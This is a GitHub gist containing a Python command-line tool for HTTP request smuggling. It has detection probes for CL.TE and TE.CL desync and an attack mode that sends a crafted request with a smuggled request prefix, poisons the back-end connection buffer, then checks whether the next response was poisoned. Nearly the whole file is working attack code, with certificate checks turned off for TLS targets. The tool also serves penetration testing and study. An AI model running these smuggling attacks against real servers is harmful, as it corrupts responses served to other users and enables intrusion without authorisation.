Skip to content

Instantly share code, notes, and snippets.

@sudoaza
Last active August 14, 2019 20:15
Show Gist options
  • Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import socket
import sys
import ssl
import argparse
from pwn import enhex
import time
def error(msg):
    """Write a debug message to standard error when debugging is enabled.

    The message is emitted only when the module-level ``args.debug`` option
    (populated by the argument parser at the bottom of the file) is truthy;
    otherwise the call is a no-op.

    Args:
        msg: Text to print.
    """
    if not args.debug:
        return
    # ``file=`` is required: passing sys.stderr positionally would print the
    # stream object's repr to stdout instead of redirecting the output.
    print(msg, file=sys.stderr)
def clte_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
    """Send the "izq" probe to *host* and report whether it was accepted.

    The probe is built with ``build_request(..., mode="izq")`` and sent with
    ``request``; the decoded response text is then searched for two markers.

    Args:
        host: Target host name, also used for the Host header.
        port: Target TCP port.
        chunked_header: Raw Transfer-Encoding header line to include.

    Returns:
        False if the response contains "400 Bad Request" or the
        "SMG_TIMEOUT" marker that ``request`` prepends on a socket timeout;
        True otherwise.
    """
    print("\nRunning CLTE Detection\n======================\n")
    probe = build_request(host, chunked_header, mode="izq")
    reply = request(host, port, probe)
    # NOTE(review): the published timing technique for this kind of probe
    # treats a back-end timeout as the CL.TE indicator, whereas here a timeout
    # counts as a rejection -- confirm this polarity is intended.
    for marker in ("400 Bad Request", "SMG_TIMEOUT"):
        if marker in reply:
            return False
    return True
def tecl_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
    """Send the "oxo" probe to *host* and report whether it timed out.

    The probe is built with ``build_request(..., mode="oxo")`` and sent with
    ``request``.

    Args:
        host: Target host name, also used for the Host header.
        port: Target TCP port.
        chunked_header: Raw Transfer-Encoding header line to include.

    Returns:
        True if the response text contains the "SMG_TIMEOUT" marker that
        ``request`` prepends when the socket times out; False otherwise.
    """
    print("\nRunning TECL Detection\n======================\n\n")
    probe = build_request(host, chunked_header, mode="oxo")
    return "SMG_TIMEOUT" in request(host, port, probe)
def build_request(host, chunked_header, main_body="", smuggled_body="", mode="izq",
                  *, method=None, path=None):
    """Assemble the raw HTTP/1.1 request text for a probe or an attack.

    Lengths (Content-Length and chunk sizes) are computed on the UTF-8
    encoding of the bodies, because the message is sent UTF-8 encoded and
    HTTP counts octets, not characters.

    Args:
        host: Value for the Host header.
        chunked_header: Raw header line (e.g. "Transfer-Encoding: chunked");
            omitted from the request when empty.
        main_body: Body the request visibly carries. Replaced by a fixed
            payload in the "izq" and "oxo" modes and by the chunk-size line
            in "tecl" mode.
        smuggled_body: Data appended after ``main_body``.
        mode: One of "clte", "tecl", "izq" or "oxo". Any other value leaves
            the bodies untouched and sends ``Content-Length: 0``.
        method: Request method; defaults to the module-level
            ``args.http_method``.
        path: Request target; defaults to the module-level ``args.file``.

    Returns:
        The complete request as a ``str`` (request line, headers, blank line,
        then ``main_body + smuggled_body``).
    """
    if method is None:
        method = args.http_method
    if path is None:
        path = args.file

    content_len = 0
    if mode == "clte":
        if main_body:
            # Prefix the body with its size in hex to form a single chunk.
            chunk_len = format(len(main_body.encode("utf-8")), "x")
            main_body = f"{chunk_len}\r\n{main_body}"
        main_body += "\r\n0\r\n\r\n"
        # The "- 2" adjustment is kept exactly as in the original script.
        content_len = len((main_body + smuggled_body).encode("utf-8")) - 2
    elif mode == "tecl":
        chunk_len = format(len(smuggled_body.encode("utf-8")), "x")
        if smuggled_body:
            smuggled_body = smuggled_body + "\r\n0\r\n\r\n"
        # Content-Length covers only the chunk-size line (hex digits + CRLF).
        content_len = len(chunk_len) + 2
        main_body = chunk_len + "\r\n"
    elif mode == "izq":
        content_len = 4
        main_body = "1\r\nZ\r\nQ\r\n"
    elif mode == "oxo":
        content_len = 6
        main_body = "0\r\n\r\nX\r\n"

    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        "Accept: */*",
    ]
    if chunked_header:
        lines.append(chunked_header)
    lines.append(f"Content-Length: {content_len}")
    head = "\r\n".join(lines) + "\r\n\r\n"
    return head + main_body + smuggled_body
def request(host, port, message):
    """Send *message* over a fresh TCP connection and return the response text.

    The request and the response are echoed to stdout. TLS (without
    certificate or host-name verification) is used only when ``port`` is 443.
    Reading stops when the peer closes the connection, when the bytes
    ``0\\r\\n\\r\\n`` appear anywhere in the data received so far, or when no
    data arrives for 3 seconds.

    Args:
        host: Host name to connect to (also used for SNI on port 443).
        port: TCP port.
        message: Complete request text; sent UTF-8 encoded.

    Returns:
        The response decoded as UTF-8 (undecodable bytes are replaced rather
        than raising). If a send/receive timed out, the returned text is
        prefixed with ``"SMG_TIMEOUT\\r\\n"``.

    Raises:
        OSError: If the connection or TLS handshake fails. The socket is
            closed in every case.
    """
    print("# REQUEST >\n" + message + "\n")
    sock = socket.socket(socket.AF_INET)
    response = b""
    try:
        if port == 443:
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            # check_hostname must be disabled before verify_mode may be
            # lowered to CERT_NONE.
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE
            sock = context.wrap_socket(sock, server_hostname=host)
        sock.connect((host, port))
        # The timeout is applied after connecting, so only send/receive
        # stalls are reported as SMG_TIMEOUT.
        sock.settimeout(3.0)
        try:
            error('sending "%s"' % message)
            sock.sendall(message.encode("utf-8"))
            while True:
                data = sock.recv(1024)
                response += data
                if len(data) == 0 or b"0\r\n\r\n" in response:
                    break
                error('received "%s"' % data)
        except socket.timeout:  # no activity for 3 seconds
            text = "SMG_TIMEOUT\r\n" + response.decode("utf-8", errors="replace")
            print("< RESPONSE #\n" + text + "\n")
            return text

        text = response.decode("utf-8", errors="replace")
        # args.full is declared with store_false, so it is True unless --full
        # was given; long responses are therefore abbreviated by default.
        if len(text) > 4000 and args.full:
            print("< RESPONSE #\n" + f"length: {len(text)}\n" + text[:4000] + "\n\n...\n\n" + text[-1000:] + "\n")
        else:
            print("< RESPONSE #\n" + f"length: {len(text)}\n" + text + "\n")
        return text
    finally:
        error('closing socket')
        sock.close()
def recon(chunked_header):
    """Run the detection probes against the configured target and print a verdict.

    Uses the module-level ``target_host`` and ``target_port``. The TECL probe
    is sent only when the CLTE probe returns False.

    Args:
        chunked_header: Raw Transfer-Encoding header line passed to both probes.
    """
    if clte_detect(target_host, target_port, chunked_header):
        verdict = "CLTE Detected"
    elif tecl_detect(target_host, target_port, chunked_header):
        verdict = "TECL Detected"
    else:
        verdict = "Not Vulnerable"
    print(verdict)
def attack(chunked_header, contraband, mode):
    """Build one request in the given mode and send it to the configured target.

    Reads the module-level ``target_host``, ``target_port`` and ``body``.
    The response is printed by ``request``; nothing is returned.

    Args:
        chunked_header: Raw Transfer-Encoding header line ("" to omit it).
        contraband: Data passed to ``build_request`` as the smuggled body.
        mode: Request layout understood by ``build_request``.
    """
    print("\nAttacking\n======================\n\n")
    payload = build_request(target_host, chunked_header, body, contraband, mode)
    request(target_host, target_port, payload)
# Command-line interface. The parsed values are kept as module-level globals
# because the functions above read ``args``, ``target_host``, ``target_port``
# and ``body`` directly.
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--domain', help='Domain', required=True)
# type=int makes argparse reject a non-numeric port with a usage error.
parser.add_argument('-p', '--port', help='Port', required=False, default=80, type=int)
# nargs='?' lets -D be used as a bare flag while still accepting the older
# "-D <value>" form.
parser.add_argument('-D', '--debug', help='Debug', required=False, nargs='?', const=True, default=False)
# NOTE: store_false is intentional here: request() abbreviates long responses
# while args.full is True, so passing --full (-> False) shows the full answer.
parser.add_argument('--full', help='Show full answer', required=False, action="store_false")
parser.add_argument('-r', '--recon', help='Check if server is vulnerable', required=False, action='store_true', default=True)
parser.add_argument('-a', '--attack', help='Poison buffer', required=False, action='store_true')
parser.add_argument('-e', '--transfer-encoding', help='Transfer Encoding header', required=False, default="Transfer-Encoding: chunked")
parser.add_argument('-c', '--contraband', help='Payload to prepend to next request', required=False, default="GET /404 HTTP/1.1\r\nFoo: b")
parser.add_argument('-m', '--mode', help='clte or tecl. Content Length in front Treansfer Encoding in back (clte).', required=False, default="clte")
parser.add_argument('-b', '--body', help='Request body', required=False, default="=x&q=smuggling&x=")
parser.add_argument('-x', '--http-method', help='Request method', required=False, default="POST")
parser.add_argument('-f', '--file', help='Request path', required=False, default="/")
args = parser.parse_args()

target_host = args.domain
target_port = args.port
# Turn escape sequences typed literally on the command line into the real
# control characters.
chunked_header = args.transfer_encoding.replace("\\n", "\n").replace("\\r", "\r").replace("\\t", "\t")
contraband = args.contraband.replace("\\r\\n", "\r\n")
mode = args.mode
body = args.body

if args.attack:
    attack(chunked_header, contraband, mode)
    # Check attack worked, we should get the poisoned response
    attack("", "", mode)
else:
    # --recon is store_true with default=True, so it is always set: recon is
    # what runs whenever --attack is not requested.
    recon(chunked_header)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment